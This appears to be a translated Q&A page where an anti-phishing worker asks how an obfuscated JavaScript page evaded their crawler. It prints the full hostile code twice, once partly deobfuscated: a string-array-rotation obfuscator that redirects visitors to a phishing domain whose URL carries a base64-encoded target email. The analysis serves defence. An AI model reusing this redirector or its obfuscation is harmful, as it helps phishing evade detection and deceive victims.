【问题标题】:Figuring Phishing redirection hidden in web source code计算隐藏在 Web 源代码中的网络钓鱼重定向
【发布时间】:2021-05-09 09:29:02
【问题描述】:

我在一家反网络钓鱼公司工作,我偶然发现了一个成功规避了我们的 JCrawler 的案例,我试图了解代码以及攻击者在这里做了什么来保持无法检测到并且无法弄清楚它真的困惑。

如何避免对此类网站的检测丢失:

<!DOCTYPE html>
<html>
<title>Loading...</title>
<link rel="shortcut icon" href="favicon_a_eupayfgghqiai7k9sol6lg2.ico" />
    <body>
        <script>
            var _0x117d=['4gSLXgI','2815VEHvFQ','14927VMrRFI','180751tIiKtp','11OWCNOZ','264810PhaCGI','49788ekTpju','https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=','53294CAvUWH','289945bcwcUH','68GhmPuA','replace','15KaunFV'];
            var _0x3d5f=function(_0x1853ca,_0x41286d){_0x1853ca=_0x1853ca-0x108;
                                                        var _0x117ddf=_0x117d[_0x1853ca];
                                                            return _0x117ddf;};
            var _0x37e4a6=_0x3d5f;
            (function(_0x5bb9bd,_0x286286){var _0xe278b9=_0x3d5f;
                                           while(!![])
                                                {try{var _0x2d8884=parseInt(_0xe278b9(0x10c))*-parseInt(_0xe278b9(0x111))+parseInt(_0xe278b9(0x10d))+-parseInt(_0xe278b9(0x112))*parseInt(_0xe278b9(0x10e))+-parseInt(_0xe278b9(0x109))+parseInt(_0xe278b9(0x113))*parseInt(_0xe278b9(0x110))+-parseInt(_0xe278b9(0x114))+parseInt(_0xe278b9(0x108))*parseInt(_0xe278b9(0x10a));
                                                     if(_0x2d8884===_0x286286)
                                                         break;
                                                     else _0x5bb9bd['push'](_0x5bb9bd['shift']());}
                                                 catch(_0x54c267){_0x5bb9bd['push'](_0x5bb9bd['shift']());}}}(_0x117d,0x339a1),location[_0x37e4a6(0x10f)](_0x37e4a6(0x10b)));      
</script>
   </body>
</html> 

【问题讨论】:

  • 请提供更多信息,例如您当前使用的方法是什么以及为什么无法捕获此案例。
  • 我正在等待我们的 JCrawler 负责团队提供有关此案的更深入信息,一旦我得到所有这些信息就会更新主题

标签: javascript html phishing


【解决方案1】:

这看起来有点像 JS 混淆器,对吧?

'use strict';
var _0x117d = ["4gSLXgI", "2815VEHvFQ", "14927VMrRFI", "180751tIiKtp", "11OWCNOZ", "264810PhaCGI", "49788ekTpju", "https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=", "53294CAvUWH", "289945bcwcUH", "68GhmPuA", "replace", "15KaunFV"];
var _0x3d5f = function _getCompositionValue(key, value) {
key = key - 264;
var value = _0x117d[key];
return value;
};
var _0x37e4a6 = _0x3d5f;
(function(data, oldPassword) {
var toMonths = _0x3d5f;
for (; !![];) {
try {
var userPsd = parseInt(toMonths(268)) * -parseInt(toMonths(273)) + parseInt(toMonths(269)) + -parseInt(toMonths(274)) * parseInt(toMonths(270)) + -parseInt(toMonths(265)) + parseInt(toMonths(275)) * parseInt(toMonths(272)) + -parseInt(toMonths(276)) + parseInt(toMonths(264)) * parseInt(toMonths(266));
if (userPsd === oldPassword) {
break;
} else {
data["push"](data["shift"]());
}
} catch (_0x54c267) {
data["push"](data["shift"]());
}
}
})(_0x117d, 211361), location[_0x37e4a6(271)](_0x37e4a6(267));

【讨论】:

  • 我猜是这样,你有没有机会尝试解释攻击者在这个混淆器中所做的事情背后的逻辑?
猜你喜欢
  • 2012-08-27
  • 1970-01-01
  • 2014-12-27
  • 2020-01-16
  • 2023-04-10
  • 2011-03-02
  • 2017-11-27
  • 2012-04-14
  • 1970-01-01
相关资源
最近更新 更多